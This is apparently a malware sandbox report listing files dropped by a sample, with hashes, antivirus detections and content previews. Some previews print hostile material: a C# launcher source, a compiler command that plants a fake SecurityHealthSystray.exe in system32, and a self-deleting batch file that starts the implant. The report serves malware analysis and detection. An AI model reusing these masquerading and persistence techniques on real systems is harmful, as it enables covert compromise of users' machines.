Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QKh80KSRWl

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES7247.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Sat Dec 28 22:30:07 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1944
Entropy (8bit):	4.545637022977478
Encrypted:	false
SSDEEP:	24:HahC9aOOZDfHN4YwKZN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:mdiKZyluOulajfqXSfbNtmhBZ
MD5:	0FB1239E93488E8E482E5100DE87BB75
SHA1:	019C57FF8369FE6E356C912C9ECB9DA45568C84F
SHA-256:	29D28C6448D8AB36D378C1B7DD9077DDA576E9DA87642E1A63CFAF648B76764B
SHA-512:	EF1CCBFE547BE22C3873A5709E42ECA9A60A932EC0F94974CE6B3F7AFA858800CC61963C4BDB466A5A93F0257F38BA8DAB600CBC33AB54BD30086EA7ED972E23
Malicious:	false
Preview:	L....{pg.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........;....c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES7247.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\webFontsession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

C:\Users\user\AppData\Local\Temp\RMsPYKtKmS

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:mxVVOx3gN6nn:mzVPM
MD5:	962D429F8FEE8C7A3BA2840CD770C955
SHA1:	463EA108AE05AC9175F99A7EBD3440803DD923A5
SHA-256:	EBE0803879645CA7EE0FC9EAE6D67953BCEC46B6C12894D05D7F3C1630396F64
SHA-512:	B109C1ECBCF78B9CFE5BBD02125051CED3BECDF2F5DDA994C7275CB591C8EC65993E309371E7BC34717CC5019273DC52E776B97E020ADC4233E0A532B4425892
Malicious:	false
Preview:	Qz0c5x20YzTMOBEu4QCSxBJGB

C:\Users\user\AppData\Local\Temp\WbeUIv0xAQ

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YKDNgRjtz2

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZD4pdctJZo

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dDoL2AKRV2

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:+cAYNPYc6:RAYC
MD5:	D9DBDE009AD1F5F1C4320A45B24B302F
SHA1:	82A896E218DB071DC763DE4D0F60C5D3F53F14A3
SHA-256:	1FC945567B6830251218145659BF3EF567A703A7F1AB0DD1017D0E0C1729D07B
SHA-512:	ACE00727E11F4596511116015E344D3EDB449B95D6475787DCD54B190C9F1F80657E505212B61495E492DBEAE2D9F174D53D848A31095025A43788498E334D1B
Malicious:	false
Preview:	0mMt6TSJaeQisLhjUZfyKkdxm

C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.0.cs

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.0158225994244106
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6ukhbkCaiFkD:JNVQIbSfhV7TiFkMSfhWDj7FkD
MD5:	1C09368D834E760D1C438DB380FC8D9F
SHA1:	2F18A1E418C401B3B416C5449207C94D1EECB1E8
SHA-256:	6347510A5489AF5DB17B21119818C001A32DA07D1934D8AF5E0812A37AA82B21
SHA-512:	8BD86CCF239AE43A32D32E4DB44DD4393F48D5423CB3C50377B9D1DA49DFA573A9C7416F18B82159742FAA4BCEEB5AFC1209AD2982093146605BD133C1D269BE
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.106070933509881
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fqa9n:Hu7L//TRq79cQWfp9n
MD5:	327F8AABDC85FE057960E10D28953B78
SHA1:	6DE136DEAF2A915F9DD85BCA56E33F5EFE3F0B90
SHA-256:	B5BE12D967D948EC1E40F1CF265712BB094EA1E5DF99AFC4DCE8B40A2E9BE7D2
SHA-512:	7C2B499869A950E0F8E9F17C7C78D40436BBC5356A97B97B2BB4054F6B4EA3C5C7B18C82EB158342B4BEF3022F5B053723260EEA2A6B405D07EDAF967BED2BE8
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.0.cs"

C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.out

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (324), with CRLF, CR line terminators
Category:	modified
Size (bytes):	745
Entropy (8bit):	5.260913171922436
Encrypted:	false
SSDEEP:	12:doI/u7L//TRq79cQWfp9uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:doI/un/Vq79tWfp9uKax5DqBVKVrdFAw
MD5:	A113ABF59981E24FFA0306A5AC714D3F
SHA1:	B56EF3D35E2893A47DD0E280B36B7BE005608554
SHA-256:	C38087A677EDB4687EC186DE120185B225F1C0C219AAA82E77996F947E7A4A25
SHA-512:	8CAF323264F25D71E5DA295EB29632ECD9A255B3F7F1F5B7CEF2240D139B16A35515008A1377D7FFA21D23C1447A0E570BC54E9CB814379BD7F778473836B8AA
Malicious:	false
Preview:	.C:\webFontsession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.134337394524852
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEBYMvx5bKOZG1wkn23fLV:HTg9uYDE+4bffDV
MD5:	DCAAF6C15CF08A3DDC46B06FFF20F65F
SHA1:	804358D57D342563061F6795F54594E416F0364F
SHA-256:	D03DBEEBE0B756FF9F3DDB5134B26A1D1D2064C63800CD3594536DDD5D9D22C7
SHA-512:	DB6BB8AB2C03ACA662F5CD38C3CF663F291F0429B319B0718C0EB38BDCF79D978C27923DFA6CA1163D169A70BA993D2BADA040177FCBDC5344D6D24E3F53CF41
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\n17UfJYjYj.bat"

C:\Users\user\AppData\Local\Temp\rJwLydX4QX

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sXbCf2RWsv

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\BssArfvD.log

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\EJYQaGiX.log

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FRcYkGBu.log

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HIyZMmJW.log

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\IqrHyRPU.log

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\KbMQbIAl.log

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\NUmFqbLL.log

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ziWzrNQC.log

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
